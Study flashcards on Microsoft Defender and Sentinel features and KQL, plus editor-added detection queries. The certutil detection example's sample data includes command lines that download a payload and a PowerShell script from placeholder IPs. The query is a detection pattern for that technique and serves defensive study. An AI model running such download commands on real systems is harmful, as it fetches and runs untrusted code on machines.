A comprehensive set of flashcards covering key concepts related to Microsoft Defender and Sentinel, including features, functions, and terms pivotal for understanding cybersecurity tools.
Microsoft Defender portal
The unified portal used for Microsoft Defender XDR.
Incident Graph
The feature in Defender XDR that visually maps out an attack story across endpoints, identities, and cloud apps.
30 days
The default retention period for Advanced Hunting data in Defender XDR.
Attack Simulation Training
The Defender for Office 365 (Plan 2) feature, surfaced in the Defender portal, that lets you run simulated phishing campaigns against your own users and assign training to those who click or submit credentials.
Live Response
The feature in Defender for Endpoint that provides a real-time remote shell to investigate a machine.
Attack Surface Reduction (ASR) rules
Rules designed to block malicious behaviors and scripts commonly used by attackers.
Defender for Identity Sensor
The tool that must be deployed on a Domain Controller to integrate with Microsoft Defender for Identity.
DCSync attack
The Defender for Identity alert ("Suspected DCSync attack (replication of directory services)") raised when a host that is not a Domain Controller uses the Directory Replication Service protocol to request replication of directory objects. This lets an attacker with replication rights pull password hashes without ever touching NTDS.dit on disk.
Safe Links
The policy in Microsoft Defender for Office 365 that protects users from malicious URLs by scanning them at the time of click.
Safe Attachments
The policy in Microsoft Defender for Office 365 that detonates email attachments in a sandbox before delivery.
Secure Score
The primary metric Defender for Cloud uses to measure your security posture.
Azure Arc
The agent-based onboarding that projects non-Azure servers and Kubernetes clusters (on-premises, AWS, GCP) into Azure Resource Manager so Defender for Cloud can assess and protect them; the AWS and GCP connectors in Defender for Cloud can deploy the Arc agent to EC2 and GCE instances automatically.
Just-In-Time (JIT) VM Access
The feature in Defender for Cloud that allows you to open management ports on a VM only for a limited time.
Adaptive Application Controls
The feature in Defender for Cloud that learns normal VM behavior and alerts on unexpected applications launching.
Defender for Containers
The Defender for Cloud plan specifically designed to protect Kubernetes clusters.
Cloud Access Security Broker (CASB)
The primary function of Microsoft Defender for Cloud Apps.
App Connectors
The deployment method in Defender for Cloud Apps that uses API integrations with services like Salesforce or AWS.
Session Policies (Conditional Access App Control)
The policy in Defender for Cloud Apps that monitors and controls user sessions in real-time.
Cloud Discovery
The feature that allows Defender for Cloud Apps to parse firewall logs and identify unsanctioned SaaS applications.
Regulatory Compliance Dashboard
The dashboard in Defender for Cloud that maps your resources against standards like ISO 27001 or PCI-DSS.
Log Analytics (Azure Data Explorer)
The underlying database technology powering a Microsoft Sentinel workspace.
Advanced Security Information Model (ASIM)
The built-in Microsoft Sentinel component that allows normalizing logs from multiple vendors into a standard format.
Scheduled Analytics Rule
The type of Sentinel analytics rule that uses KQL to query logs at a specific interval and generate alerts.
Near Real-Time (NRT) Rules
The Sentinel analytics rule type designed to run every minute for immediate threat detection.
Fusion Rules
The correlation engine in Microsoft Sentinel that uses machine learning to combine many lower-fidelity signals and alerts from different sources into a single high-fidelity incident describing a multistage attack.
Azure Logic Apps
The Azure service required to build and run automated Playbooks in Microsoft Sentinel.
Watchlists
The feature that allows importing external data to correlate with Sentinel logs.
Data Connectors
The component that acts as the bridge to ingest data from third-party sources into Sentinel.
Azure Monitor Agent (AMA)
The agent that must be installed to ingest Syslog or CEF data from Linux servers into Sentinel (via the "Syslog via AMA" and "CEF via AMA" connectors); the legacy Log Analytics agent (MMA) it replaces was retired in August 2024.
Bookmarks
The feature that allows security analysts to preserve KQL query results to attach to an incident for later review.
Investigation Graph
The visual tool in Microsoft Sentinel that maps relationships between alerts, entities, and bookmarks during an investigation.
Workbooks
The feature in Sentinel that provides interactive visual reports and dashboards for your data.
730 days (2 years)
The maximum interactive retention period for a table in a Log Analytics workspace; data kept longer moves to long-term (archive) retention, where it is not available to ordinary queries and must be reached with a search job or restore.
Automation Rules
The feature in Sentinel that allows you to group and centrally manage automated response actions.
Microsoft Sentinel Responder
The Azure RBAC role that lets a user view data and manage incidents (assign, change status, dismiss) without being able to create or edit analytics rules and workbooks. Running playbooks from Sentinel requires a separate role, Microsoft Sentinel Playbook Operator (or Logic App Contributor to edit them).
Content Hub Solutions
The feature that provides pre-packaged collections of data connectors, analytics rules, and workbooks for specific products.
Data Collection Rules (DCR) / Log Ingestion API
The type of data connector that relies on a REST API to push logs into the Sentinel workspace.
Data Collection Rules (DCR) transformations
The component used to parse and enrich data during ingestion before it is stored in Sentinel.
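Worked example added by the editor (not part of the original flashcard set) of what the transformation on this card looks like: the KQL below is the value of a Data Collection Rule's `transformKql` property for the `Microsoft-Syslog` stream (in the portal it is typed into the table's transformation editor). `source` is the real virtual input table name; the events it drops (cron session open/close chatter and debug-severity messages) are editorial choices, not a Microsoft recommendation.

```kusto
// Ingestion-time transformation for the Syslog table. `source` carries the stream's
// columns (TimeGenerated, Computer, Facility, SeverityLevel, ProcessName, SyslogMessage, ...).
// Rows removed here never reach the workspace, so they are neither stored nor queryable.
source
// Cron writes "pam_unix(cron:session): session opened/closed for user ..." on every job run;
// on busy hosts this is the bulk of Syslog volume and carries no detection value.
| where not(ProcessName == "CRON" and SyslogMessage has_any ("session opened", "session closed"))
// Debug-severity messages are dropped; every other severity is kept for analytics rules.
| where SeverityLevel != "debug"
```

Transformations support only a subset of KQL (where, extend, project, project-away, project-rename, parse and a limited set of scalar functions; no join, summarize or external data), and the output must still contain `TimeGenerated`. A filter that discards more than half of the incoming data incurs a processing charge on the portion above 50%, so measure the drop rate before relying on a transformation purely for cost control.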
User and Entity Behavior Analytics (UEBA)
The Sentinel feature that identifies anomalous user activity by establishing a baseline of normal behavior.
Entity mapping
The step in an analytics rule (or Defender XDR custom detection) that maps query result columns to standard Sentinel entity types such as Account, Host, IP and URL, so that the resulting alerts carry entities for the investigation graph and for UEBA scoring. It is configured in the rule wizard, not in UEBA itself.
where
The KQL operator used to filter a table to only show specific rows that match a condition.
summarize
The KQL operator that groups data together and calculates aggregations.
project
The KQL operator used to select specific columns to include in the output.
project-away
The KQL operator that removes specific columns from the query output.
extend
The KQL operator used to create a new custom column or calculate a value based on existing columns.
join
The KQL operator that combines rows from two tables based on a common matching column.
union
The KQL operator that combines two or more tables and returns all rows.
let
The KQL statement that allows assigning a variable name to an expression or subquery.
take (or limit)
The KQL operator used to return a specific number of arbitrary rows.
now()
The KQL function that returns the current date and time.
parse
The KQL operator that extracts data from a string into new columns by matching it against a pattern of literals and column names (`parse Col with "prefix" Name " " *`); rows that do not match get empty values rather than an error. The default `kind=simple` is not a regular expression; use `parse kind=regex` or the `extract()` function for regex matching.
sort by (or order by)
The KQL operator that sorts the rows of the input table by one or more columns.
search
The KQL operator that searches across all columns in a table for a specific string value.
distinct
The KQL operator that returns the distinct combinations of the specified columns, dropping duplicate rows.
count
The KQL operator that returns the number of rows in its input; `count()` is the corresponding aggregation function used inside `summarize`.
make-series
The KQL operator that generates a series of values, often used to create time charts.
bin()
The KQL function used to bin or group time data into specific intervals.
10,000
The maximum number of records a single query in Defender XDR Advanced Hunting can return.
10 minutes
The execution timeout limit for a single query in Defender XDR Advanced Hunting.
render
The KQL operator that renders the query results into a visual chart.
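Worked example added by the editor (not part of the original flashcard set) that exercises most of the operators on the cards above in one query. It runs unchanged in any Kusto environment (the Sentinel Logs blade, Advanced Hunting, Kusto Explorer) because its input is a constructed `datatable`, not a real log table; the column names mirror Sentinel's SigninLogs schema, and the rows, the `Users` lookup table and the threshold of three failures are illustrative assumptions.

```kusto
// Constructed sign-in rows (not real telemetry) so the query is self-contained.
let SignIns = datatable(TimeGenerated:datetime, UserPrincipalName:string, IPAddress:string, ResultType:string, UserAgent:string)
[
    datetime(2024-05-01 08:00:00), "alice@contoso.com", "203.0.113.10", "0",     "Mozilla/5.0 (Windows NT 10.0)",
    datetime(2024-05-01 08:05:00), "bob@contoso.com",   "198.51.100.7", "50126", "Mozilla/5.0 (Windows NT 10.0)",
    datetime(2024-05-01 08:06:00), "bob@contoso.com",   "198.51.100.7", "50126", "Mozilla/5.0 (Windows NT 10.0)",
    datetime(2024-05-01 08:07:00), "bob@contoso.com",   "198.51.100.7", "50126", "Mozilla/5.0 (Windows NT 10.0)",
    datetime(2024-05-01 08:09:00), "bob@contoso.com",   "198.51.100.7", "0",     "Mozilla/5.0 (Windows NT 10.0)",
    datetime(2024-05-01 09:30:00), "carol@contoso.com", "192.0.2.44",   "0",     "python-requests/2.31",
];
// Constructed lookup table standing in for a watchlist (_GetWatchlist) or an HR feed.
let Users = datatable(UserPrincipalName:string, Department:string)
[
    "alice@contoso.com", "Finance",
    "bob@contoso.com",   "IT",
];
SignIns
| where TimeGenerated between (datetime(2024-05-01) .. datetime(2024-05-02))   // keep one day of rows
| extend Outcome = iff(ResultType == "0", "Success", "Failure")               // derived column
| parse UserAgent with Client "/" Version " " *                                // "Mozilla/5.0 (...)" -> Client="Mozilla", Version="5.0";
                                                                               // "python-requests/2.31" has no space after the version, so
                                                                               // its Client/Version come back empty (no error)
| summarize Failures  = countif(Outcome == "Failure"),
            Successes = countif(Outcome == "Success"),
            Clients   = make_set(Client),
            FirstSeen = min(TimeGenerated),
            LastSeen  = max(TimeGenerated)
          by UserPrincipalName, IPAddress, bin(TimeGenerated, 1h)              // one row per user, source IP and hour
| where Failures >= 3 and Successes >= 1                                       // several failures followed by a success in the same hour
| join kind=leftouter Users on UserPrincipalName                               // enrich; users missing from the lookup keep an empty Department
| project-away UserPrincipalName1                                              // join copies the key column from the right side as <name>1
| project UserPrincipalName, Department, IPAddress, Hour = TimeGenerated, Failures, Successes, Clients, FirstSeen, LastSeen
| sort by Failures desc
```

With this data the query returns a single row for bob@contoso.com from 198.51.100.7 in the 08:00 hour (3 failures, 1 success, Department "IT"). Swap the `SignIns` table for `SigninLogs | where TimeGenerated > ago(1d)` and the same shape becomes a scheduled analytics rule; `make-series ... | render timechart` would replace the `summarize ... by bin()` when you want the per-hour counts drawn as a chart rather than listed.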
Device Isolation
The feature in Defender for Endpoint that isolates a compromised device from the network.
Full automation
The level of automation in Defender for Endpoint that investigates and remediates threats automatically.
Action Center
The centralized location in Defender XDR to review and approve pending remediation actions.
Honeytokens
The Defender for Identity feature that lets you tag decoy accounts (typically dormant accounts with attractive-looking names) that no legitimate process should ever use; any authentication attempt or LDAP query involving them raises an alert.
Diagnostic Settings
The Azure feature that must be configured to forward Microsoft Entra ID (formerly Azure AD) sign-in and audit logs to a Log Analytics workspace; enabling the Microsoft Entra ID data connector in Sentinel creates these settings for you.
Add an indicator to block the file hash
The action in Defender XDR (Settings > Endpoints > Indicators, or "Add indicator" from a file page) that stops a specific executable from running on any onboarded endpoint. It requires the "Allow or block file" advanced feature to be turned on and Microsoft Defender Antivirus to be the active antimalware engine on the device.
Microsoft Security Copilot
The Microsoft tool that uses generative AI to assist analysts with incident summaries and KQL generation.
Promptbooks
The feature in Security Copilot that allows saving sequences of prompts for repetitive tasks.
Plugins
What must be configured to allow Security Copilot to pull data from third-party security products.
SQL Vulnerability Assessment
The Defender for Cloud feature that identifies vulnerabilities in SQL databases.
Microsoft Purview
The Microsoft tool that provides centralized visibility and governance for data sensitivity and compliance.
Threat Explorer
The feature in Defender for Office 365 that shows the exact delivery path of an email.
Device Discovery
The Defender for Endpoint feature that helps discover unmanaged endpoints, network devices, and IoT devices.
Custom Detection Rules
The Defender XDR feature that allows you to create custom alerts based on Advanced Hunting KQL query results.
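Worked example added by the editor (not part of the original flashcard set) of a query shaped for a custom detection rule: it hunts for `certutil.exe` being used as a downloader, a long-standing living-off-the-land technique. The `SampleProcessEvents` table is constructed sample data whose columns mirror `DeviceProcessEvents`; to run it against live telemetry in Advanced Hunting, delete the `let` block and replace `SampleProcessEvents` with `DeviceProcessEvents`. The internal-domain allowlist is a hypothetical tuning step.

```kusto
// Constructed process-creation rows (not real telemetry) mirroring the DeviceProcessEvents schema.
let SampleProcessEvents = datatable(
    Timestamp:datetime, DeviceId:string, DeviceName:string, ReportId:long, AccountName:string,
    FileName:string, ProcessCommandLine:string, InitiatingProcessFileName:string)
[
    datetime(2024-05-01 10:00:00), "d1a2", "ws-finance-01", 101, "alice", "certutil.exe",
        @"certutil.exe -urlcache -split -f http://203.0.113.55/payload.bin C:\Users\Public\p.bin", "cmd.exe",
    datetime(2024-05-01 10:02:00), "d1a2", "ws-finance-01", 102, "alice", "certutil.exe",
        @"certutil.exe -hashfile C:\Windows\System32\kernel32.dll SHA256", "powershell.exe",
    datetime(2024-05-01 10:05:00), "e9f0", "srv-build-02", 203, "svc_build", "certutil.exe",
        @"certutil -verify -urlfetch C:\certs\signing.cer", "msbuild.exe",
    datetime(2024-05-01 10:07:00), "e9f0", "srv-build-02", 204, "svc_build", "CERTUTIL.EXE",
        @"CERTUTIL.EXE -URLCACHE -f https://198.51.100.9/update.ps1 update.ps1", "wscript.exe",
];
SampleProcessEvents
| where FileName =~ "certutil.exe"                                    // =~ is case-insensitive equality
| where ProcessCommandLine has_any ("urlcache", "verifyctl")          // download switches; `has` matches whole terms, case-insensitively,
                                                                      // so "-URLCACHE" matches and "urlfetch" does not
| extend Url = extract(@"(?i)(https?://\S+)", 1, ProcessCommandLine)  // RE2 regex; capture group 1 is the URL
| where isnotempty(Url)                                               // -urlcache with no URL only lists the local cache
| where not(Url has "contoso.com")                                    // hypothetical allowlist for internal update servers; tune per environment
// A custom detection rule needs Timestamp, ReportId and at least one identifier column
// (DeviceId here) so the alert can be attached to the device and response actions applied.
| project Timestamp, DeviceId, ReportId, DeviceName, AccountName, InitiatingProcessFileName, ProcessCommandLine, Url
```

On the sample rows this returns two events (the `cmd.exe` and `wscript.exe` launched downloads) and ignores the hash-check and certificate-verification uses. No explicit time filter is needed in a custom detection: the rule's frequency setting defines the lookback window, and rows older than 30 days are not queryable in Advanced Hunting anyway.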
The analyst must have the appropriate RBAC permissions and the file must not exceed size limits.
What is required before an analyst can download a file using Live Response in Defender for Endpoint.
Microsoft Defender Threat Intelligence (MDTI)
To provide raw threat intelligence, indicators of compromise (IOCs), and adversary profiles for proactive hunting.
Archived Logs
The lower-cost retention tier in the Log Analytics workspace (archive, now called long-term retention) that should be configured to keep logs for compliance beyond the interactive period; archived data is reached through search jobs or restore rather than normal queries, and total retention can be set to as much as 12 years.